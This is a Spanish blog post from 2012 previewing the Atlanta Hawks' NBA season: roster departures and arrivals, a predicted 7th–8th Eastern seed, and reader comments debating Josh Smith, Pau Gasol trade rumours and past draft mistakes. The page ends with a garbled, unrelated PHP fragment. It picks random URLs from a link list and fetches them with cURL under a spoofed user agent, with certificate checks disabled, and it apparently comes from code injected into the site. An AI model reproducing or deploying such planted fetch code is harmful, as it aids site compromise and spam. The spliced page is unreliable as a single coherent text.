Atlanta Hawks: Volando a ras

13 de October de 2012 por TheDeerHunter

Aunque nuestra realidad social y económica parezca indicarnos lo contrario, la vida enseña que en ocasiones hay que retroceder para avanzar, empeorar para mejorar, descender para después ascender. Pocas cosas terminan siendo un recto camino de rosas o una escalera al cielo… aunque por fortuna sucede algunas veces.

Lo primero que hizo el señor Danny Ferry al ocupar el trono de General Mannager de los Hawks fue, ni más ni menos, lo que casi todo el mundo reclamaba desde hace tiempo: deshacerse del costosísimo contrato de Joe Johnson que condicionaba todas las opciones de la franquicia. No era fácil ni podía salir gratis. No estamos hablando de un Arenas de la vida. Johnson es un excelente jugador con un contrato exagerado respecto a su estatus. Cualquier operación que se pudiera plantear al respecto suponía una pérdida de nivel a la franquicia sí o sí. Creo que esto lo tendríamos asumido todos.

El perímetro de los Hawks no sólo se ha visto trastocado por la salida de Jo Jo. Por unos motivos u otros se marchan Marvin Williams, Kirk Hinrich, Jordan Farmar, Vlad Radmanovic, Willie Green y Jerry Stackhouse. Sin entrar a valorar el nivel de cada uno, ni lo que supone su salida para la franquicia, es un hecho que había que reconstruir el perímetro prácticamente desde 0 alrededor de Jeff Teague como único superviviente del mismo.

Para ocupar estas plazas vacantes se ha tratado de utilizar la máxima bueno-bonito-barato. Se sale algo de la norma Devin Harris aunque es expiring. Tratará de reencontrarse a si mismo peleando la plaza a Teague. Un jugador en extraña decadencia, pero incluso una versión mediocre suya refuerza lo que han tenido que sufrir los Hawks en la dirección los últimos años y lo mismo el cambio de aires y su último año de contrato le sientan bien.

También llega Lou Williams previsiblemente para continuar realizando ese gran trabajo que ofrecía en Philly saliendo desde el banco. No hará olvidar a JoJo pero estoy seguro que se ganará hasta el último dólar de su asumible contrato.

Diría que Larry Drew saldrá con Korver y Morrow de titulares. Finos anotadores que no han logrado ser indiscutibles nunca. Deberían dar un paso adelante defensivamente para que el equipo no se resienta. DeShawn Stevenson llega para ofrecer su tradicional labor de destrucción y veremos cuantos minutos disfruta en pista el rookie Jenkins.

Por dentro caras más conocidas. Sin lesiones de por medio Horford y Josh Smith continuaran ofreciendo sus excelentes prestaciones pseudo-all star. Pachulia a cumplir. Petro, Tolliver, Ivan Johnson y Mike Scott se repartirán minutos de intensidad y faltas rápidas. Ganarán el pan con el sudor de su frente.

Estos mimbres no les darán para asegurar la segunda ronda, pero diría que sí para pelear alguna de las últimas plazas de playoff. A partir de ahí, una 7ª u 8ª plaza en esta conferencia supone prácticamente la eliminación temprana. El coste de la reestructuración afrontada y de abrir puertas a un futuro mejor… o al menos a un futuro con un impuesto de lujo significativamente menor.

Altas: Lou Williams, Devin Harris, Kyle Korver, Anthony Morrow, DeShawn Stevenson, Petro, Jordan Williams, John Jenkins
Bajas: Joe Johnson, Marvin Williams, Hinrich, Farmar, Radmanovic, Green, Stackhouse, Jason Collins

Quinteto: Harris/Teague, Morrow, Korver, Smith, Horford
6ºHombre: Louis Williams

Pronóstico: 50% victorias. 7ª-8ª plaza del Este y eliminados en primera ronda.

Comenta

17 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Como dices, la reconstrucción era necesaria. El equipo vivía totalmente anclado en el pasado, en una ilusión que comenzó hace unas 4-5 temporadas, con aquel playoff al que llegaron con 37 victorias y casi eliminan luego a los Celtics campeones, y a partir de ahí no pasaron de jugar primeras y segundas rondas sin aspirar a nada más. Ahora el siguiente paso tiene que ser necesariamente saber qué van a hacer con Josh Smith. El chico está más que harto del panorama actual, sabe que estos Hawks no aspiran a nada a medio-largo plazo y lo más normal es que sea la pieza más codiciada el próximo verano. A priori, el único jugador que se va a quedar sí o sí es Horford, y a partir de ahí les tocará reconstruir. Lou Williams y Teague pueden hacer una buena pareja de bases en el futuro, pero teóricamente todos los demás sobran, incluso Smith. No obstante, los Hawks llamaron a las puertas de Pau. Que nadie se extrañe si acabamos viendo a Smith+Korver en Los Ángeles y a Pau rumbo Atlanta, en un secarral junto a Horford. Para los Hawks no tendría mucho sentido, porque necesitan reconstruir en torno a jugadores jóvenes, pero algo tendrán que hacer, porque si no les va a pasar lo mismo que a los Magic, se van a quedar sin nada y van a hacer el rídiculo. Bueno, aunque cuándo no han hecho el ridículo estos nenes? Prefirieron a Rahim que a Pau, ahí queda todo dicho.

    No les veo en postemporada, pero si llegasen, que lo dudo, sería a base del corage de Horford y Smith, y se demostraría la mierda de conferencia en la que juegan. Yo soy romántico y digo que estos tipos no pueden llegar ni de coña. 33-49. Y a seguir reconstruyendo…

      Citar

  2. nba dice:
    #2

    El objetivo de este equipo es entrar en playoff, y una vez ahi que surja la sorpresa.
    Como comenta Sancho lo bueno es que J.Smith sigue un año mas, pero con la pujanza de los ilusionantes Nets, me da a mi, que no va a aguantar mucho mas de esta temporada, y no me extrañaria que se hiciese el trade que comentas y Pau volviese a sus origenes.
    Estoy ansioso por ver si Ivan Johnson es capaz de aportar algo mas de lo que se vio en la ultima temporada, ya que no parece para nada un inberbe en esta liga

      Citar

  3. simon dice:
    #3

    Sancho88:
    Yo soy romántico y digo que estos tipos no pueden llegar ni de coña. 33-49. Y a seguir reconstruyendo…

    Jejej tio a lo mejor eres un maquina pronosticando y de aqui a 10 meses tengo que estar alabandote y pidiendote perdon pero le das menos victorias a estos Hawks que a Sacramento?? jajaja en que línea son mas completos los Kings que los Hawks?? Y eso sin entrar a valorar el nivel de las conferencias.

      Citar

  4. Esteban dice:
    #4

    ustedes sabran algo que yo no se por eso lo pregunto

    es mucha la diferencia economica entre jugar PO y no jugarlos?

    por que coincido con el analisis, que en principio si todo sale redondo podrian calsificar o quedarse 9nos o 10s en el este, mi pregunta es para q?

    no son los BOBCATS de wallace y jackson que lograron la clasificacion por primera vez y eso era merito, los HAWKS vienen jugando PO hace años y con lop que tienen ahora es imposible pensar en pasar primera ronda

    por eso es mi pregunta es para que? si estan en un año de transicion que mejor que perder lo suficiente para salir cerca del top 5 del proximo draft, con harford, teague, smith y williams, un rookie bueno y tanto espacio, estarian reconstruyendo en un abrir y cerrar de ojos

    si terminan clasificando a PO o

      Citar

  5. Esteban dice:
    #5

    novenos en el este sui pick sera bien bajo

    o sea, toy a favor de los equipos que compiten, pero estos hawks no tienen nada con que ilusionarse, mejor seria dar otro paso atras para dar dos hacia adelante

      Citar

  6. Sancho88 dice:
    #6

    Hombre, línea por línea, creo sinceramente que el juego exterior de los Kings le da doscientasmil vueltas al de los Hawks. Luego, DeMarcus es bastante mejor y con mas progresión que Horford, y el único jugador que no se puede comparar es Smith… pero vamos, yo creo que sí, que Sacramenteo firmará mejor temporada que Atlanta. Estoy seguro

      Citar

  7. Esteban dice:
    #7

    gente donde podemos comentar la post temporada?

    madre, alguien vion el nuevo fisico de KANTER? mamita asusta, si jugara en un equipo con otro juego interior seria mi apuesta para el jugador mas mejorado

      Citar

  8. portu dice:
    #8

    Bueno, Esteban, ni idea de la parte económica que implica entrar en playoffs, pero no hace mucho ha habido equipos q han dado campanadas sonadas en playoffs viniendo desde los últimos puestos de su conferencia, como por ejemplo Dallas, Warriors hace unos años, etc, sin embargo, lo q comentas de quedar fuera de playoffs y optar a un pick 5 ya no es tan sencillo, hay q quedar fuera de playoffs y preferiblemente ser muy muy muy malos. No es sencillo para una franquicia sostener temporadas nefastas para luego llevarte un pick 8 o 10 o lo q sea, o simplemente, elegir mal con picks más altos, o incluso lo q le puede pasar a equipos como Orlando, que los próximos drafts no traigan ni de lejos la calidad y la cantidad de jugadores buenos q parecía traer este año 2012. La temporada q podía haber sido del paso adelante para Atlanta se vió truncada en parte por la lesión de Horford. Estamos subestimando la capacidad de un grupo q se mantiene con casi los mismos mimbres año tras año para lograr buenos resultados, pero yo lo entiendo casi al revés, es casi imposible q un equipo con muchas caras nuevas funcione desde el principio. Otra cosa bien diferente es pensar en cuál es el techo de jugadores como Josh Smith, JJ, Horford, Marvin Williams,… para mi francamente sobrevalorados la mayoría de ellos, empezando por josh Smith, q ha tardado muchos años en darse cuenta q no es un tirador de triples o q sus virtudes son otras. Si eres un Josh Smith o un G. Wallace no puedes empeñarte en querer ser un Durant, no sale bien. Luego pues agujeros en algunas posiciones y banquillo habitualmente flojete, realmente estos Hawks de años atrás tenían pólvora para llegar más lejos? yo creo q no, bastante hicieron con lo q tenían. Podemos compararlos con Indiana, equipo con mucho más talento ofensivo a mi modod de ver, tanto en las alas como ofensivamente por dentro con Hibbert y West, y sobretodo, muy duros y aguerridos en todas las posiciones.

      Citar

  9. Sancho88 dice:
    #9

    @Portu, entonces, según tú, quién se las debería jugar en los Hawks? Smush Parker? jejeje

      Citar

  10. Heineken dice:
    #10

    Imaginaros lo que podían haber sido si en lugar de elegir en el numero 6 de 2004 a Childress hubiesen elegido a Iguodala o Deng (eligieron a Josh Smith el 17), en lugar de en el puesto 2 del 2005 a Marvin Williams hubiesen elegido a D-Will o Chris Paul. En 2006 con el numero 5 en lugar de Shelden Williams se dejaron a gente como Brandon Roy o Rudy Gay

    Y teniendo en cuenta que el año siguiente eligieron en el puesto 3 y se llevaron a Horford y en el 11 a Acie Law (por detrás de este se eligieron a jugadores como Nick Young, Wilson Chandler, Thaddeus Young, Stuckey, Afflalo… y en 2º ronda salieron Glenn Davis, Marc Gasol)

    Quiero decir, que aunque a toro pasado es más fácil ver que se equivocaron, encadenaron 4 años con elecciones TOP 6 (6, 2, 5, 3) y teniendo algunos años doble elección en primera ronda en puestos altos y de todas ellas… las acertadas fueron una 17 (Smith) y la 3 de Horford. Y durante estos años que hicieron? traerse a un Mike Bibby en decadencia, luego pagar un pastizal a Joe Johnson… con el que dieron el salto de calidad, entrar en playoffs holgados, meter algún susto en postemporada, pero hipotecando el futuro del equipo.

    En fin, este año no les doy ni entrar en playoffs, 34 victorias a lo sumo.

    PD: Imaginaos que podrían haber tenido un quinteto asi: Paul-Brandon Roy- Iguodala-Josh Smith-Al Horford y de 6º hombre (Nick Young o Wilson Chandler).

      Citar

  11. nba dice:
    #11

    Heineken, elecciones como esas dan sentido al seguimiento que se hace de la NBA, sino fuese por esas historias la NBA seria como cualquier otra liga de baloncesto.IImaginate lo que podria haber sido la franquicia de los Blazzers sino,en vez de ser el “pupas” de la liga .Pero una cosa que tienen los americanos buena es, que suelen ver que es lo mejor para el negocio

      Citar

  12. lost dice:
    #12

    Pero el rendimiento del equipo hubiese mejorado y por lo tanto, con una base Iguodala-Smith-Paul el equipo en 2006 no es TOP-5 del Draft ni de coña.

      Citar

  13. portu dice:
    #13

    portu: Bueno, Esteban, ni idea de la parte económica que implica entrar en playoffs, pero no hace mucho ha habido equipos q han dado campanadas sonadas en playoffs viniendo desde los últimos puestos de su conferencia, como por ejemplo Dallas, Warriors hace unos años, etc, sin embargo, lo q comentas de quedar fuera de playoffs y optar a un pick 5 ya no es tan sencillo, hay q quedar fuera de playoffs y preferiblemente ser muy muy muy malos. No es sencillo para una franquicia sostener temporadas nefastas para luego llevarte un pick 8 o 10 o lo q sea, o simplemente, elegir mal con picks más altos, o incluso lo q le puede pasar a equipos como Orlando, que los próximos drafts no traigan ni de lejos la calidad y la cantidad de jugadores buenos q parecía traer este año 2012. La temporada q podía haber sido del paso adelante para Atlanta se vió truncada en parte por la lesión de Horford. Estamos subestimando la capacidad de un grupo q se mantiene con casi los mismos mimbres año tras año para lograr buenos resultados, pero yo lo entiendo casi al revés, es casi imposible q un equipo con muchas caras nuevas funcione desde el principio. Otra cosa bien diferente es pensar en cuál es el techo de jugadores como Josh Smith, JJ, Horford, Marvin Williams,… para mi francamente sobrevalorados la mayoría de ellos, empezando por josh Smith, q ha tardado muchos años en darse cuenta q no es un tirador de triples o q sus virtudes son otras. Si eres un Josh Smith o un G. Wallace no puedes empeñarte en querer ser un Durant, no sale bien. Luego pues agujeros en algunas posiciones y banquillo habitualmente flojete, realmente estos Hawks de años atrás tenían pólvora para llegar más lejos? yo creo q no, bastante hicieron con lo q tenían. Podemos compararlos con Indiana, equipo con mucho más talento ofensivo a mi modod de ver, tanto en las alas como ofensivamente por dentro con Hibbert y West, y sobretodo, muy duros y aguerridos en todas las posiciones.

    Pues Josh Smith desde 7m seguro que no… Probablemente no me he explicado bien, a mi JJ me parece un gran jugador, pero igual q se ha comentado más arriba algo sobrevalorado, eso sí, perfectamente capaz de jugarse muchos tiros y desde muchas posiciones distintas. Cerca del aro son tb solventes Josh Smith (q es una fiera en las transiciones rápidas) y Horford… sólo decía q Josh Smith durante varios años (los mejores de JJ por edad y momento de forma) abusó del tiro exterior, de conducir el balón por fuera, etc, juego ofensivo q no era su punto fuerte. Por otro lado, cuando han tenido un base como Teague capaz de crearse sus propios tiros y de aportar cosas diferentes no han tenido la suerte de tener al mejor JJ y han tenido a Horford lesionado.

      Citar

  14. portu dice:
    #14

    Intentaba citar a Sancho…

      Citar

  15. Sancho88 dice:
    #15

    Sip, pero el año pasado me parece que cambió casi totalmente esas tonterías que hacía otros años. Por lo menos, yo le vi jugar muchísimo como 4 del equipo. Ahora bien, fue por la lesión de Horford y no sé si este año el plan es poner a Horford-Pachulia y Smith como 3 o Smith-Horford juntos. Supongo que ambas cosas ocurrirán, pero a mí me convence mucho más Smith jugando de 4, ya que puede defender a cualquier poste, sabe jugar perfectamente el poste bajo, es veloz y puede marear a muchas marcas y como recurso, salirse a media-larga distancia para tirar tampoco está tan mal. Repito, como recurso, no como norma. A mi juicio es un jugador que debería estar en un contender ya. Quizá, yo le pondría en los Hornets o en Lakers

      Citar

  16. nba dice:
    #16

    Sancho sin menospreciar a los Hornets, pero tu ves a smith alli?, teniendo en cuenta que se quiere ir de Atlanta?

      Citar

  17. GreenPride dice:
    #17

    Por fin los Hawks han dejado de vivir de aquella eliminatoria de 2008 contra los campeones Celtics y se han dado cuenta de que tenían que dar un cambio de rumbo. Con JoJo y su super-contrato por fin fuera de Atlanta y con un perímetro renovado los Hawks tienen peor equipo que estos pasados años pero al menos tienen futuro por el que luchar. Sinceramente o mucho cambian las cosas o creo que Josh Smith hará las maletas este verano con lo que les quedará espacio para hacer una reconstrucción sobre Horford y Teague. Para este año luchar por las últimas plazas de PO y si lo consiguieran caer en primera ronda aunque yo trataría de ejecutar un trade por Josh Smith que trajera a alguien interesante a la franquicia para reconstruir con él. Temporada de transición en Atlanta

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>